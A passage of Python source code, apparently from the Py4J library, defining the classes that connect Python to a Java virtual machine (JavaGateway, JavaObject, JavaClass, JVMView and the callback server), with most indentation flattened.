cmd = "{0}\n{1}\n".format(
proto.AUTH_COMMAND_NAME,
self.gateway_parameters.auth_token
)
answer = self.send_command(cmd)
error, _ = proto.is_error(answer)
if error:
# At this point we do not expect the caller to clean
# the connection so we clean ourselves.
self.close(reset=True)
raise Py4JAuthenticationError(
"Failed to authenticate with gateway server.")
def close(self, reset=False):
"""Closes the connection by closing the socket.
If reset is True, sends a RST packet with SO_LINGER
"""
if reset:
set_linger(self.socket)
else:
            # Send shutdown before attempting to close a stream or socket.
quiet_shutdown(self.socket)
quiet_close(self.stream)
quiet_close(self.socket)
self.is_connected = False
def shutdown_gateway(self):
"""Sends a shutdown command to the gateway. This will close the gateway
server: all active connections will be closed. This may be useful
if the lifecycle of the Java program must be tied to the Python
program.
"""
if not self.is_connected:
raise Py4JError("Gateway must be connected to send shutdown cmd.")
try:
quiet_close(self.stream)
self.socket.sendall(
proto.SHUTDOWN_GATEWAY_COMMAND_NAME.encode("utf-8"))
quiet_close(self.socket)
self.is_connected = False
except Exception:
# Do nothing! Exceptions might occur anyway.
logger.debug("Exception occurred while shutting down gateway",
exc_info=True)
def send_command(self, command):
"""Sends a command to the JVM. This method is not intended to be
called directly by Py4J users: it is usually called by JavaMember
instances.
:param command: the `string` command to send to the JVM. The command
must follow the Py4J protocol.
:rtype: the `string` answer received from the JVM (The answer follows
the Py4J protocol).
"""
logger.debug("Command to send: {0}".format(command))
try:
# Write will only fail if remote is closed for large payloads or
# if it sent a RST packet (SO_LINGER)
self.socket.sendall(command.encode("utf-8"))
except Exception as e:
logger.info("Error while sending.", exc_info=True)
raise Py4JNetworkError(
"Error while sending", e, proto.ERROR_ON_SEND)
try:
answer = smart_decode(self.stream.readline()[:-1])
logger.debug("Answer received: {0}".format(answer))
if answer.startswith(proto.RETURN_MESSAGE):
answer = answer[1:]
            # Happens when the other end is dead. There might be an empty
# answer before the socket raises an error.
if answer.strip() == "":
raise Py4JNetworkError("Answer from Java side is empty")
return answer
except Exception as e:
logger.info("Error while receiving.", exc_info=True)
raise Py4JNetworkError(
"Error while receiving", e, proto.ERROR_ON_RECEIVE)
class JavaMember(object):
"""Represents a member (i.e., method) of a :class:`JavaObject`. For now,
only methods are supported. Fields are retrieved directly and are not
contained in a JavaMember.
"""
def __init__(self, name, container, target_id, gateway_client):
self.name = name
self.container = container
self.target_id = target_id
self.gateway_client = gateway_client
self.command_header = self.target_id + "\n" + self.name + "\n"
self.pool = self.gateway_client.gateway_property.pool
self.converters = self.gateway_client.converters
self._gateway_doc = None
@property
def __doc__(self):
# The __doc__ string is used by IPython/PyDev/etc to generate
# help string, therefore provide useful help
if self._gateway_doc is None:
self._gateway_doc = gateway_help(
self.gateway_client, self, display=False)
return self._gateway_doc
def _get_args(self, args):
temp_args = []
new_args = []
for arg in args:
if not isinstance(arg, JavaObject):
for converter in self.gateway_client.converters:
if converter.can_convert(arg):
temp_arg = converter.convert(arg, self.gateway_client)
temp_args.append(temp_arg)
new_args.append(temp_arg)
break
else:
new_args.append(arg)
else:
new_args.append(arg)
return (new_args, temp_args)
def _build_args(self, *args):
if self.converters is not None and len(self.converters) > 0:
(new_args, temp_args) = self._get_args(args)
else:
new_args = args
temp_args = []
args_command = "".join(
[get_command_part(arg, self.pool) for arg in new_args])
return args_command, temp_args
def stream(self, *args):
"""
Call the method using the 'binary' protocol.
:rtype: The `GatewayConnection` that the call command was sent to.
"""
args_command, temp_args = self._build_args(*args)
command = proto.STREAM_COMMAND_NAME +\
self.command_header +\
args_command +\
proto.END_COMMAND_PART
answer, connection = self.gateway_client.send_command(
command, binary=True)
# parse the return value to throw an exception if necessary
get_return_value(
answer, self.gateway_client, self.target_id, self.name)
for temp_arg in temp_args:
temp_arg._detach()
return connection
def __call__(self, *args):
args_command, temp_args = self._build_args(*args)
command = proto.CALL_COMMAND_NAME +\
self.command_header +\
args_command +\
proto.END_COMMAND_PART
answer = self.gateway_client.send_command(command)
return_value = get_return_value(
answer, self.gateway_client, self.target_id, self.name)
for temp_arg in temp_args:
temp_arg._detach()
return return_value
class JavaObject(object):
"""Represents a Java object from which you can call methods or access
fields."""
def __init__(self, target_id, gateway_client):
"""
:param target_id: the identifier of the object on the JVM side. Given
by the JVM.
:param gateway_client: the gateway client used to communicate with
the JVM.
"""
self._target_id = target_id
self._gateway_client = gateway_client
self._auto_field = gateway_client.gateway_property.auto_field
self._methods = {}
self._field_names = set()
self._fully_populated = False
self._gateway_doc = None
key = smart_decode(self._gateway_client.address) +\
smart_decode(self._gateway_client.port) +\
self._target_id
if self._gateway_client.gateway_property.enable_memory_management:
value = weakref.ref(
self,
lambda wr, cc=self._gateway_client, id=self._target_id:
_garbage_collect_object and _garbage_collect_object(cc, id))
ThreadSafeFinalizer.add_finalizer(key, value)
def _detach(self):
_garbage_collect_object(self._gateway_client, self._target_id)
def _get_object_id(self):
return self._target_id
@property
def __doc__(self):
# The __doc__ string is used by IPython/PyDev/etc to generate
# help string, therefore provide useful help
if self._gateway_doc is None:
self._gateway_doc = gateway_help(
self._gateway_client, self, display=False)
return self._gateway_doc
def __getattr__(self, name):
if name == "__call__":
# Provide an explicit definition for __call__ so that a JavaMember
# does not get created for it. This serves two purposes:
# 1) IPython (and others?) stop showing incorrect help indicating
# that this is callable
# 2) A TypeError(object not callable) is raised if someone does try
# to call here
raise AttributeError
if name not in self._methods:
if (self._auto_field):
(is_field, return_value) = self._get_field(name)
if (is_field):
self._field_names.add(name)
return return_value
# Theoretically, not thread safe, but the worst case scenario is
# cache miss or double overwrite of the same method...
self._methods[name] = JavaMember(
name, self, self._target_id, self._gateway_client)
# The name is a method
return self._methods[name]
def __dir__(self):
self._populate_fields()
return list(set(self._methods.keys()) | self._field_names)
def _populate_fields(self):
# Theoretically, not thread safe, but the worst case scenario is
# cache miss or double overwrite of the same method...
if not self._fully_populated:
if self._auto_field:
command = proto.DIR_COMMAND_NAME +\
proto.DIR_FIELDS_SUBCOMMAND_NAME +\
self._target_id + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return_value = get_return_value(
answer, self._gateway_client, self._target_id, "__dir__")
self._field_names.update(return_value.split("\n"))
command = proto.DIR_COMMAND_NAME +\
proto.DIR_METHODS_SUBCOMMAND_NAME +\
self._target_id + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return_value = get_return_value(
answer, self._gateway_client, self._target_id, "__dir__")
names = return_value.split("\n")
for name in names:
if name not in self._methods:
self._methods[name] = JavaMember(
name, self, self._target_id, self._gateway_client)
self._fully_populated = True
def _get_field(self, name):
command = proto.FIELD_COMMAND_NAME +\
proto.FIELD_GET_SUBCOMMAND_NAME +\
self._target_id + "\n" +\
name + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
if answer == proto.NO_MEMBER_COMMAND or is_error(answer)[0]:
return (False, None)
else:
return_value = get_return_value(
answer, self._gateway_client, self._target_id, name)
return (True, return_value)
def __eq__(self, other):
if other is None:
return False
elif (hasattr2(other, "_get_object_id")):
return self.equals(other)
else:
return other.__eq__(self)
def __hash__(self):
return self.hashCode()
def __str__(self):
return self.toString()
def __repr__(self):
# For now...
return "JavaObject id=" + self._target_id
class JavaClass(object):
"""A `JavaClass` represents a Java Class from which static members can be
retrieved. `JavaClass` instances are also needed to initialize an array.
Usually, `JavaClass` are not initialized using their constructor, but
they are created while accessing the `jvm` property of a gateway, e.g.,
`gateway.jvm.java.lang.String`.
"""
def __init__(self, fqn, gateway_client):
self._fqn = fqn
self._gateway_client = gateway_client
self._pool = self._gateway_client.gateway_property.pool
self._command_header = fqn + "\n"
self._converters = self._gateway_client.converters
self._gateway_doc = None
self._statics = None
@property
def __doc__(self):
# The __doc__ string is used by IPython/PyDev/etc to generate
# help string, therefore provide useful help
if self._gateway_doc is None:
self._gateway_doc = gateway_help(
self._gateway_client, self, display=False)
return self._gateway_doc
def __dir__(self):
# Theoretically, not thread safe, but the worst case scenario is
# cache miss or double overwrite of the same method...
if self._statics is None:
command = proto.DIR_COMMAND_NAME +\
proto.DIR_STATIC_SUBCOMMAND_NAME +\
self._fqn + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return_value = get_return_value(
answer, self._gateway_client, self._fqn, "__dir__")
self._statics = return_value.split("\n")
return self._statics[:]
@property
def _java_lang_class(self):
"""Gets the java.lang.Class of the current JavaClass. This is
equivalent to calling .class in Java.
"""
command = proto.REFLECTION_COMMAND_NAME +\
proto.REFL_GET_JAVA_LANG_CLASS_SUB_COMMAND_NAME +\
self._fqn + "\n" + proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
if len(answer) > 1 and answer[0] == proto.SUCCESS:
return get_return_value(
answer, self._gateway_client, self._fqn, "_java_lang_class")
else:
raise Py4JError(
"{0} does not exist in the JVM".format(self._fqn))
def __getattr__(self, name):
if name in ["__str__", "__repr__"]:
raise AttributeError
command = proto.REFLECTION_COMMAND_NAME +\
proto.REFL_GET_MEMBER_SUB_COMMAND_NAME +\
self._fqn + "\n" +\
name + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
if len(answer) > 1 and answer[0] == proto.SUCCESS:
if answer[1] == proto.METHOD_TYPE:
return JavaMember(
name, None, proto.STATIC_PREFIX + self._fqn,
self._gateway_client)
elif answer[1].startswith(proto.CLASS_TYPE):
return JavaClass(
self._fqn + "$" + name, self._gateway_client)
else:
return get_return_value(
answer, self._gateway_client, self._fqn, name)
else:
raise Py4JError(
"{0}.{1} does not exist in the JVM".format(self._fqn, name))
def _get_args(self, args):
temp_args = []
new_args = []
for arg in args:
if not isinstance(arg, JavaObject):
for converter in self._converters:
if converter.can_convert(arg):
temp_arg = converter.convert(arg, self._gateway_client)
temp_args.append(temp_arg)
new_args.append(temp_arg)
break
else:
new_args.append(arg)
else:
new_args.append(arg)
return (new_args, temp_args)
def __call__(self, *args):
# TODO Refactor to use a mixin shared by JavaMember and JavaClass
if self._converters is not None and len(self._converters) > 0:
(new_args, temp_args) = self._get_args(args)
else:
new_args = args
temp_args = []
args_command = "".join(
[get_command_part(arg, self._pool) for arg in new_args])
command = proto.CONSTRUCTOR_COMMAND_NAME +\
self._command_header +\
args_command +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return_value = get_return_value(
answer, self._gateway_client, None, self._fqn)
for temp_arg in temp_args:
temp_arg._detach()
return return_value
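# Illustrative sketch (not part of the original module): static access
# through JavaClass. Static methods come back as JavaMember instances with
# the STATIC_PREFIX target id, while static fields are fetched eagerly by
# __getattr__. Assumes a running gateway.
def _example_java_class_statics():
    gateway = JavaGateway()
    System = gateway.jvm.java.lang.System  # a JavaClass
    millis = System.currentTimeMillis()    # static method call
    max_int = gateway.jvm.java.lang.Integer.MAX_VALUE  # static field
    return millis, max_int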
class UserHelpAutoCompletion(object):
"""
Type a package name or a class name.
For example with a JVMView called view:
>>> o = view.Object() # create a java.lang.Object
>>> random = view.jvm.java.util.Random() # create a java.util.Random
The default JVMView is in the gateway and is called:
>>> gateway.jvm
By default, java.lang.* is available in the view. To
add additional Classes/Packages, do:
>>> from py4j.java_gateway import java_import
>>> java_import(gateway.jvm, "com.example.Class1")
>>> instance = gateway.jvm.Class1()
Package and class completions are only available for
explicitly imported Java classes. For example, if you
java_import(gateway.jvm, "com.example.Class1")
then Class1 will appear in the completions.
"""
KEY = "<package or class name>"
class JavaPackage(object):
"""A `JavaPackage` represents part of a Java package from which Java
classes can be accessed.
Usually, `JavaPackage` are not initialized using their constructor, but
they are created while accessing the `jvm` property of a gateway, e.g.,
`gateway.jvm.java.lang`.
"""
def __init__(self, fqn, gateway_client, jvm_id=None):
self._fqn = fqn
self._gateway_client = gateway_client
        if jvm_id is None:
            self._jvm_id = proto.DEFAULT_JVM_ID
        else:
            self._jvm_id = jvm_id
def __dir__(self):
return [UserHelpAutoCompletion.KEY]
def __getattr__(self, name):
if name == UserHelpAutoCompletion.KEY:
return UserHelpAutoCompletion
if name in ["__str__", "__repr__"]:
raise AttributeError
if name == "__call__":
raise Py4JError("Trying to call a package.")
new_fqn = self._fqn + "." + name
command = proto.REFLECTION_COMMAND_NAME +\
proto.REFL_GET_UNKNOWN_SUB_COMMAND_NAME +\
new_fqn + "\n" +\
self._jvm_id + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
if answer == proto.SUCCESS_PACKAGE:
return JavaPackage(new_fqn, self._gateway_client, self._jvm_id)
elif answer.startswith(proto.SUCCESS_CLASS):
return JavaClass(
answer[proto.CLASS_FQN_START:], self._gateway_client)
else:
raise Py4JError("{0} does not exist in the JVM".format(new_fqn))
class JVMView(object):
"""A `JVMView` allows access to the Java Virtual Machine of a
`JavaGateway`.
This can be used to reference static members (fields and methods) and
to call constructors.
"""
def __init__(self, gateway_client, jvm_name, id=None, jvm_object=None):
self._gateway_client = gateway_client
self._jvm_name = jvm_name
if id is not None:
self._id = id
elif jvm_object is not None:
self._id = proto.REFERENCE_TYPE + jvm_object._get_object_id()
# So that both JVMView instances (on Python and Java) have the
# same lifecycle. Theoretically, JVMView could inherit from
# JavaObject, but I would like to avoid the use of reflection
# for regular Py4J classes.
self._jvm_object = jvm_object
self._dir_sequence_and_cache = (None, [])
def __dir__(self):
command = proto.DIR_COMMAND_NAME +\
proto.DIR_JVMVIEW_SUBCOMMAND_NAME +\
self._id + "\n" +\
get_command_part(self._dir_sequence_and_cache[0]) +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return_value = get_return_value(
            answer, self._gateway_client, self._id, "__dir__")
if return_value is not None:
result = return_value.split("\n")
# Theoretically, not thread safe, but the worst case scenario is
# cache miss or double overwrite of the same method...
self._dir_sequence_and_cache = (
result[0], result[1:] + [UserHelpAutoCompletion.KEY])
return self._dir_sequence_and_cache[1][:]
def __getattr__(self, name):
if name == UserHelpAutoCompletion.KEY:
return UserHelpAutoCompletion()
answer = self._gateway_client.send_command(
proto.REFLECTION_COMMAND_NAME +
proto.REFL_GET_UNKNOWN_SUB_COMMAND_NAME + name + "\n" + self._id +
"\n" + proto.END_COMMAND_PART)
if answer == proto.SUCCESS_PACKAGE:
return JavaPackage(name, self._gateway_client, jvm_id=self._id)
elif answer.startswith(proto.SUCCESS_CLASS):
return JavaClass(
answer[proto.CLASS_FQN_START:], self._gateway_client)
else:
_, error_message = get_error_message(answer)
message = compute_exception_message(
"{0} does not exist in the JVM".format(name), error_message)
raise Py4JError(message)
class GatewayProperty(object):
"""Object shared by callbackserver, gateway, and connections.
"""
def __init__(self, auto_field, pool, enable_memory_management=True):
self.auto_field = auto_field
self.pool = pool
self.enable_memory_management = enable_memory_management
class JavaGateway(object):
"""A `JavaGateway` is the main interaction point between a Python VM and
a JVM.
* A `JavaGateway` instance is connected to a `Gateway` instance on the
Java side.
* The `entry_point` field of a `JavaGateway` instance is connected to
the `Gateway.entryPoint` instance on the Java side.
* The `java_gateway_server` field of a `JavaGateway` instance is connected
to the `GatewayServer` instance on the Java side.
* The `jvm` field of `JavaGateway` enables user to access classes, static
members (fields and methods) and call constructors.
Methods that are not defined by `JavaGateway` are always redirected to
`entry_point`. For example, ``gateway.doThat()`` is equivalent to
``gateway.entry_point.doThat()``. This is a trade-off between convenience
and potential confusion.
"""
def __init__(
self, gateway_client=None, auto_field=False,
python_proxy_port=DEFAULT_PYTHON_PROXY_PORT,
start_callback_server=False, auto_convert=False, eager_load=False,
gateway_parameters=None, callback_server_parameters=None,
python_server_entry_point=None):
"""
:param gateway_parameters: An instance of `GatewayParameters` used to
configure the various options of the gateway.
:param callback_server_parameters: An instance of
            `CallbackServerParameters` used to configure various options of the
            callback server. Must be provided to start a callback server.
            Otherwise, callbacks won't be available.
:param python_server_entry_point: can be requested by the Java side if
Java is driving the communication.
"""
# a pool of sessions
self.sessions_pool = GatewaySessionPool()
self.gateway_parameters = gateway_parameters
if not gateway_parameters:
self.gateway_parameters = GatewayParameters(
auto_field=auto_field, auto_convert=auto_convert,
eager_load=eager_load)
self.callback_server_parameters = callback_server_parameters
if not callback_server_parameters:
# No parameters were provided so do not autostart callback server.
# TODO BASE 64
raw_token = unescape_new_line(self.gateway_parameters.auth_token)
self.callback_server_parameters = CallbackServerParameters(
port=python_proxy_port, eager_load=False,
auth_token=raw_token)
# Check for deprecation warnings
if auto_field:
deprecated("JavaGateway.auto_field", "1.0", "GatewayParameters")
if auto_convert:
deprecated("JavaGateway.auto_convert", "1.0", "GatewayParameters")
if eager_load:
deprecated("JavaGateway.eager_load", "1.0", "GatewayParameters")
if start_callback_server:
deprecated(
"JavaGateway.start_callback_server and python_proxy_port",
"1.0", "CallbackServerParameters")
self.callback_server_parameters.eager_load = True
if gateway_client:
deprecated("JavaGateway.gateway_client", "1.0",
"GatewayParameters")
else:
gateway_client = JavaGateway.create_gateway_client(self.gateway_parameters)
self.python_server_entry_point = python_server_entry_point
self._python_proxy_port = python_proxy_port
self.gateway_property = JavaGateway.create_gateway_property(
self.gateway_parameters,
python_server_entry_point=self.python_server_entry_point)
# Setup gateway client
self.set_gateway_client(gateway_client)
# Setup callback server property
self._callback_server = None
if self.gateway_parameters.eager_load:
self._eager_load()
if self.callback_server_parameters.eager_load:
self.start_callback_server(self.callback_server_parameters)
@classmethod
def create_gateway_client(cls, gateway_parameters, gateway_property=None):
gateway_client = GatewayClient(
gateway_parameters=gateway_parameters,
gateway_property=gateway_property)
return gateway_client
@classmethod
def create_gateway_property(cls, gateway_parameters, python_server_entry_point=None):
gateway_property = GatewayProperty(
gateway_parameters.auto_field, PythonProxyPool(),
gateway_parameters.enable_memory_management)
if python_server_entry_point:
gateway_property.pool.put(
python_server_entry_point, proto.ENTRY_POINT_OBJECT_ID)
return gateway_property
def set_gateway_client(self, gateway_client):
"""Sets the gateway client for this JavaGateway. This sets the
appropriate gateway_property and resets the main jvm view (self.jvm).
This is for advanced usage only. And should only be set before the
gateway is loaded.
"""
gateway_client.gateway_property = self.gateway_property
self._gateway_client = JavaGateway.setup_gateway_client(gateway_client)
self.entry_point = JavaObject(
proto.ENTRY_POINT_OBJECT_ID, self._gateway_client)
self.java_gateway_server = JavaObject(
proto.GATEWAY_SERVER_OBJECT_ID, self._gateway_client)
self.jvm = JVMView(
self._gateway_client, jvm_name=proto.DEFAULT_JVM_NAME,
id=proto.DEFAULT_JVM_ID)
self.sessions_pool.put(GatewaySession(gateway_client, self.gateway_property.pool, self.jvm))
@classmethod
def setup_gateway_client(cls, gateway_client):
if gateway_client.gateway_parameters.auto_convert:
gateway_client.converters = proto.INPUT_CONVERTER
else:
gateway_client.converters = None
return gateway_client
def __getattr__(self, name):
return self.entry_point.__getattr__(name)
def _eager_load(self):
try:
self.jvm.System.currentTimeMillis()
except Exception:
self.shutdown()
raise
def get_callback_server(self):
return self._callback_server
def start_callback_server(self, callback_server_parameters=None):
"""Starts the callback server.
:param callback_server_parameters: parameters to use to start the
server. If not provided, it will use the gateway callback server
parameters.
:rtype: Returns True if the server was started by this call or False if
it was already started (you cannot have more than one started
callback server).
"""
if self._callback_server:
return False
if not callback_server_parameters:
callback_server_parameters = self.callback_server_parameters
self._callback_server = self._create_callback_server(
callback_server_parameters)
try:
self._callback_server.start()
except Py4JNetworkError:
# Clean up ourselves before raising the exception.
self.shutdown()
self._callback_server = None
raise
return True
def _create_callback_server(self, callback_server_parameters):
callback_server = CallbackServer(
self.gateway_property.pool, self._gateway_client,
callback_server_parameters=callback_server_parameters,
sessions_pool=self.sessions_pool)
return callback_server
def new_jvm_view(self, name="custom jvm"):
"""Creates a new JVM view with its own imports. A JVM view ensures
that the import made in one view does not conflict with the import
of another view.
Generally, each Python module should have its own view (to replicate
Java behavior).
:param name: Optional name of the jvm view. Does not need to be
unique, i.e., two distinct views can have the same name
(internally, they will have a distinct id).
:rtype: A JVMView instance (same class as the gateway.jvm instance).
"""
        return JavaGateway.make_new_jvm_view(self._gateway_client, name)
@classmethod
    def make_new_jvm_view(cls, gateway_client, name="custom jvm", id=None):
command = proto.JVMVIEW_COMMAND_NAME + \
proto.JVM_CREATE_VIEW_SUB_COMMAND_NAME + \
get_command_part(name) + \
proto.END_COMMAND_PART
logger.info("Creating new JVM for "+str(gateway_client.address)+":"+str(gateway_client.port))
answer = gateway_client.send_command(command)
java_object = get_return_value(answer, gateway_client)
return JVMView(
gateway_client=gateway_client, jvm_name=name,
            jvm_object=java_object, id=id)
def new_array(self, java_class, *dimensions):
"""Creates a Java array of type `java_class` of `dimensions`
:param java_class: The :class:`JavaClass` instance representing the
type of the array.
:param dimensions: A list of dimensions of the array. For example
`[1,2]` would produce an `array[1][2]`.
:rtype: A :class:`JavaArray <py4j.java_collections.JavaArray>`
instance.
"""
if len(dimensions) == 0:
raise Py4JError("new arrays must have at least one dimension")
command = proto.ARRAY_COMMAND_NAME +\
proto.ARRAY_CREATE_SUB_COMMAND_NAME +\
get_command_part(java_class._fqn)
for dimension in dimensions:
command += get_command_part(dimension)
command += proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return get_return_value(answer, self._gateway_client)
def shutdown(self, raise_exception=False):
"""Shuts down the :class:`GatewayClient` and the
:class:`CallbackServer <py4j.java_callback.CallbackServer>`.
:param raise_exception: If `True`, raise an exception if an error
occurs while shutting down (very likely with sockets).
"""
try:
self._gateway_client.shutdown_gateway()
except Exception:
if raise_exception:
raise
else:
logger.info(
"Exception while shutting down callback server",
exc_info=True)
self.shutdown_callback_server()
def shutdown_callback_server(self, raise_exception=False):
"""Shuts down the
:class:`CallbackServer <py4j.java_callback.CallbackServer>`.
:param raise_exception: If `True`, raise an exception if an error
occurs while shutting down (very likely with sockets).
"""
if self._callback_server is None:
# Nothing to shutdown
return
try:
self._callback_server.shutdown()
except Exception:
if raise_exception:
raise
else:
logger.info(
"Exception while shutting down callback server",
exc_info=True)
def close_callback_server(self, raise_exception=False):
"""Closes the
:class:`CallbackServer <py4j.java_callback.CallbackServer>`
connections.
:param raise_exception: If `True`, raise an exception if an error
occurs while closing the callback server connections
(very likely with sockets).
"""
if self._callback_server is None:
# Nothing to shutdown
return
try:
self._callback_server.close()
except Exception:
if raise_exception:
raise
else:
logger.info(
"Exception while closing callback server",
exc_info=True)
def restart_callback_server(self):
"""Shuts down the callback server (if started) and restarts a new one.
"""
self.shutdown_callback_server()
self._callback_server = None
self.start_callback_server(self.callback_server_parameters)
def close(
self, keep_callback_server=False,
close_callback_server_connections=False):
"""Closes all gateway connections. A connection will be reopened if
necessary (e.g., if a :class:`JavaMethod` is called).
:param keep_callback_server: if `True`, the callback server is not
shut down. Mutually exclusive with
close_callback_server_connections.
:param close_callback_server_connections: if `True`, close all
callback server connections.
"""
self._gateway_client.close()
if not keep_callback_server:
deprecated(
"JavaGateway.close.keep_callback_server", "1.0",
"JavaGateway.shutdown_callback_server")
self.shutdown_callback_server()
elif close_callback_server_connections:
self.close_callback_server()
def detach(self, java_object):
"""Makes the Java Gateway dereference this object.
The equivalent of this method is called when a JavaObject instance
is garbage collected on the Python side. This method, or gc.collect()
should still be invoked when memory is limited or when too many objects
are created on the Java side.
:param java_object: The JavaObject instance to dereference (free) on
the Java side.
"""
java_object._detach()
def help(self, var, pattern=None, short_name=True, display=True):
"""Displays a help page about a class or an object.
:param var: JavaObject, JavaClass or JavaMember for which a help page
will be generated.
:param pattern: Star-pattern used to filter the members. For example
"get\*Foo" may return getMyFoo, getFoo, getFooBar, but not
bargetFoo. The pattern is matched against the entire signature.
To match only the name of a method, use "methodName(\*".
:param short_name: If True, only the simple name of the parameter
types and return types will be displayed. If False, the fully
qualified name of the types will be displayed.
:param display: If True, the help page is displayed in an interactive
page similar to the `help` command in Python. If False, the page is
returned as a string.
"""
return gateway_help(
self._gateway_client, var, pattern, short_name, display)
@classmethod
def launch_gateway(
cls, port=0, jarpath="", classpath="", javaopts=[],
die_on_exit=False, redirect_stdout=None,
redirect_stderr=None, daemonize_redirect=True, java_path="java",
create_new_process_group=False, enable_auth=False):
"""Launch a `Gateway` in a new Java process and create a default
:class:`JavaGateway <py4j.java_gateway.JavaGateway>` to connect to
it.
See :func:`launch_gateway <py4j.java_gateway.launch_gateway>` for more
information about this function.
:param port: the port to launch the Java Gateway on. If no port is
specified then an ephemeral port is used.
:param jarpath: the path to the Py4J jar. Only necessary if the jar
was installed at a non-standard location or if Python is using
a different `sys.prefix` than the one that Py4J was installed
under.
:param classpath: the classpath used to launch the Java Gateway.
:param javaopts: an array of extra options to pass to Java (the
classpath should be specified using the `classpath` parameter,
not `javaopts`.)
:param die_on_exit: if `True`, the Java gateway process will die when
this Python process exits or is killed.
:param redirect_stdout: where to redirect the JVM stdout.
If None (default)
stdout is redirected to os.devnull. Otherwise accepts a
file descriptor, a queue, or a deque. Will send one line at a time
to these objects.
        :param redirect_stderr: where to redirect the JVM stderr.
If None (default)
stderr is redirected to os.devnull. Otherwise accepts a
file descriptor, a queue, or a deque. Will send one line at a time
to these objects.
:param daemonize_redirect: if True, the consumer threads will be
daemonized and will not prevent the main Python process from
exiting. This means the file descriptors (stderr, stdout,
redirect_stderr, redirect_stdout) might not be properly closed.
This is not usually a problem, but in case of errors related
to file descriptors, set this flag to False.
:param java_path: If None, Py4J will use $JAVA_HOME/bin/java if
$JAVA_HOME is defined, otherwise it will use "java".
:param create_new_process_group: If True, the JVM is started in a new
process group. This ensures that signals sent to the parent Python
process are not forwarded to the JVM. For example, sending
Ctrl-C/SIGINT won't interrupt the JVM. If the python process dies,
the Java process will stay alive, which may be a problem for some
scenarios though.
:param enable_auth: If True, the server will require clients to provide
an authentication token when connecting.
:rtype: a :class:`JavaGateway <py4j.java_gateway.JavaGateway>`
connected to the `Gateway` server.
"""
_ret = launch_gateway(
port, jarpath, classpath, javaopts, die_on_exit,
redirect_stdout=redirect_stdout, redirect_stderr=redirect_stderr,
daemonize_redirect=daemonize_redirect, java_path=java_path,
create_new_process_group=create_new_process_group,
enable_auth=enable_auth)
if enable_auth:
_port, _auth_token = _ret
else:
_port, _auth_token = _ret, None
gateway = JavaGateway(
gateway_parameters=GatewayParameters(port=_port,
auth_token=_auth_token))
return gateway
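# Illustrative sketch (not part of the original module): a typical session
# with the classmethod above. launch_gateway spawns the JVM, the jvm view
# exposes classes, new_array builds arrays, and shutdown tears everything
# down. Assumes the py4j jar is installed in its default location.
def _example_gateway_session():
    gateway = JavaGateway.launch_gateway()
    array = gateway.new_array(gateway.jvm.double, 2, 3)  # double[2][3]
    array[0][0] = 1.0
    value = gateway.jvm.java.lang.Math.sqrt(array[0][0])
    gateway.shutdown()
    return value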
# CALLBACK SPECIFIC
class CallbackServer(object):
"""The CallbackServer is responsible for receiving call back connection
requests from the JVM. Usually connections are reused on the Java side,
but there is at least one connection per concurrent thread.
"""
def __init__(
self, pool, gateway_client, port=DEFAULT_PYTHON_PROXY_PORT,
address=DEFAULT_ADDRESS, callback_server_parameters=None,
sessions_pool=None):
"""
:param pool: the pool responsible of tracking Python objects passed to
the Java side.
:param gateway_client: the gateway client used to call Java objects.
:param callback_server_parameters: An instance of
`CallbackServerParameters` used to configure various options of the
callback server.
"""
self.gateway_client = gateway_client
self.sessions_pool = sessions_pool
self.callback_server_parameters = callback_server_parameters
if not callback_server_parameters:
deprecated(
"CallbackServer.port and address", "1.0",
"CallbackServerParameters")
self.callback_server_parameters = CallbackServerParameters(
address=address, port=port)
self.port = self.callback_server_parameters.port
self.address = self.callback_server_parameters.address
self.ssl_context = self.callback_server_parameters.ssl_context
self.pool = pool
self.connections = weakref.WeakSet()
# Lock is used to isolate critical region like connection creation.
        # Some code can produce exceptions when run in parallel, but
        # they will be caught and dealt with.
self.lock = RLock()
self.is_shutdown = False
self.is_shutting_down = False
def start(self):
"""Starts the CallbackServer. This method should be called by the
client instead of run()."""
af_type = socket.getaddrinfo(self.address, self.port)[0][0]
self.server_socket = socket.socket(af_type, socket.SOCK_STREAM)
set_reuse_address(self.server_socket)
try:
self.server_socket.bind((self.address, self.port))
# 4-tuple for ipv6, 2-tuple for ipv4
info = self.server_socket.getsockname()
self._listening_address = info[0]
self._listening_port = info[1]
except Exception as e:
msg = "An error occurred while trying to start the callback "\
"server ({0}:{1})".format(self.address, self.port)
logger.exception(msg)
raise Py4JNetworkError(msg, e)
        # Maybe the thread needs to be cleaned up?
self.thread = Thread(target=self.run)
# Default is False
self.thread.daemon = self.callback_server_parameters.daemonize
self.thread.start()
def get_listening_port(self):
"""Returns the port on which the callback server is listening to.
Different than `port` when port is 0.
"""
return self._listening_port
def get_listening_address(self):
"""Returns the address on which the callback server is listening to.
May be different than `address` if `address` was an alias (e.g.,
localhost).
"""
return self._listening_address
def run(self):
"""Starts listening and accepting connection requests.
This method is called when invoking `CallbackServer.start()`. A
CallbackServer instance is created and started automatically when
a :class:`JavaGateway <py4j.java_gateway.JavaGateway>` instance is
created.
"""
try:
with self.lock:
self.is_shutdown = False
logger.info("Callback Server Starting")
self.server_socket.listen(5)
logger.info(
"Socket listening on {0}".
format(smart_decode(self.server_socket.getsockname())))
server_started.send(
self, server=self)
read_list = [self.server_socket]
while not self.is_shutdown:
readable, writable, errored = select.select(
read_list, [], [],
self.callback_server_parameters.accept_timeout)
if self.is_shutdown:
break
for s in readable:
socket_instance, _ = self.server_socket.accept()
if self.callback_server_parameters.read_timeout:
socket_instance.settimeout(
self.callback_server_parameters.read_timeout)
if self.ssl_context:
socket_instance = self.ssl_context.wrap_socket(
socket_instance, server_side=True)
input = socket_instance.makefile("rb")
connection = CallbackServer._create_connection(
socket_instance, input, self.pool,
                        self.gateway_client, self.callback_server_parameters,
self)
with self.lock:
if not self.is_shutdown:
self.connections.add(connection)
connection.start()
server_connection_started.send(
self, connection=connection)
else:
quiet_shutdown(connection.socket)
quiet_close(connection.socket)
except Exception as e:
